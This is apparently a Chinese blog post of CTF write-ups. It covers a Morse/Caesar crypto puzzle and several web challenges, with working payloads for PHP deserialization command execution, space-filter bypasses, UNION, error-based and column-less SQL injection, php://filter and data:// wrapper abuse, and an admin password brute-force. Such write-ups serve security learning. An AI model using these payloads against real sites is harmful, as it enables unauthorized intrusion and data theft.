youbing的博客

附件是一段摩斯密码音频解码后得到

3.2-..3-.23-.32-32.-3..-/..2-223-.32-322-..3-..2-/2.2-3..-232-223-..2-.32-/3.2-..3-.23-3.3-..3-/.32-32.-322-.3.-/.3.-33.-22.-23.-..3-.23-..2-3..-/.2.-..3-2.2-3..-.23-/23.-.33-.32-2.2-3..-/3.2-223-322-332-3..-233这里三进制转换再凯撒偏移14得到再根据flag的格式得到flag

NSSCTF{FOR_THE_NATION_WE_CANT_FORGO_THIS_SKYBORNE_POWER_BUT_WE_FAILED}

根据题目得出流程 反序列化开始->__destruct()-> __destruct() ->__toString() -> __get() ->__invoke() ->执行命令

构造payload：

O:1:”F”:3:{s:4:”user”;s:4:”SWPU”;s:6:”passwd”;s:3:”NSS”;s:5:”notes”;O:1:”T”:1:{s:3:”sth”;O:1:”C”:1:{s:6:”whoami”;O:3:”NSS”:2:{s:3:”cmd”;s:4:”ls /“;}}}}

Base64编码后输入发现flag

O:1:”F”:3:{s:4:”user”;s:4:”SWPU”;s:6:”passwd”;s:3:”NSS”;s:5:”notes”;O:1:”T”:1:{s:3:”sth”;O:1:”C”:1:{s:6:”whoami”;O:3:”NSS”:2:{s:3:”cmd”;s:9:”cat /flag”;}}}}

得到flag

这到题尝试/admin进入后台看看，进入后台界面，猜测用户名admin然后爆破得到密码12345

发现可以下载文件，查看下载链接发现经过md5加密发现被base64加密了，解码发现是绝对路径，用/flag，base64后尝试能不能下载到，下载到flag.zip但是打不开改成.txt得到flag

发现源码中的注释让我们传一个web，web的MD5值和他本来的值一样这里传一个0e215962017然后进入了start.php，注释中让我们去看robots协议，打开robots.txt,发现是乱码修复编码后告诉我们f14g.php,进入f14g.php告诉我们这里是假的但是找了别的地方没有找到线索查看网络时发现让我们去F1l1l1l1l1lag.php，打开发现源代码这里不让用flag和空格构造一个绕过的payload：system(“nl%09/*”);成功得到flag

这里空格，-，+都被禁用了，这里用%a0代替空格

1%27%a0union%a0select%a01,2,3,4%a0and%a0%271%27=%271判断回显位

1%27%a0and%a01=2%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(SCHEMA_NAME)%a0FROM%a0information_schema.SCHEMATA),2,3%a0and%a0%271%27=%271查库名

查到应该cgctf应该是藏flag的地方

1%27%a0and%a01=2%a0union%a0select%a01,group_concat(table_name),3,4%a0from%a0information_schema.tables%a0where%a0table_schema=%27cgctf%27%a0and%a0%271%27=%271查表名，查到pcnumber

1%27%a0and%a01=2%a0union%a0select%a01,column_name,3,4%a0from%a0information_schema.columns%a0where%a0table_name=%27pcnumber%27%a0||%27查列名，查到一个flag

1%27%a0and%a01=2%a0union%a0select%a01,(select%a0group_concat(flag)%a0from%a0cgctf.pcnumber),3,4%a0||%27查flag字段

得到flag

测试发现database()被过滤了，用1’-a()#爆出库名这里试一下

1’ || extractvalue(0,concat(0x7e,1,0x7e));#回显1

1’ || extractvalue(0,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema like ‘sqlsql’),1,30),0x7e));#

得到Fal_flag,output

这里发现column也被禁用了，用无列注入

-1’||extractvalue(1,concat(0x7e,(select *from (select *from output a join output b)c)))#

查到data查data

-1’||extractvalue(1,concat(0x7e,(select data from output)))#

只显示了一半用mid截取

-1’||extractvalue(1,concat(0x7e,mid((select data from output),20)))#

这道题用data协议绕过第一个限制，然后flag被禁止了题目提示useless.php，构造payload

?text=data://text/plain,welcome%20to%20the%20zjctf&file=php://filter/convert.base64-encode/resource=useless.php

然后得到一段base64编码解码后得到useless.php

file)){ echo file_get_contents($this->file); echo "
"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?>

这里让password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}去得到flag

最后payload：?text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

查看源码得到flag

``

题目问我们能找到hint.php这里发现url中有一个?wllm=,尝试读取php://filter/read=convert.base64-encode/resource=hint.php，解码后发现让我们去/test2222222222222.php，打开发现要得到一个a文件内容是I want flag，这里用data协议a=data://text/plain,I want flag成功得到flag

``

这里测出来有5个字段，用database查库的时候一直报错，这里可能用的是SQLite使用

?id=-1 union select 1,2,3,4,(select sql from sqlite_master limit 0,1 ) –+查到flag

然后获取flag

?id=-1 union select 1,2,3,4,group_concat(flag) from flag–+

这道题按照要求POST传id=wllmNB，再GET传JSON字符串{“x”:”wllm”}让json[‘x’]=wllm

最后得到flag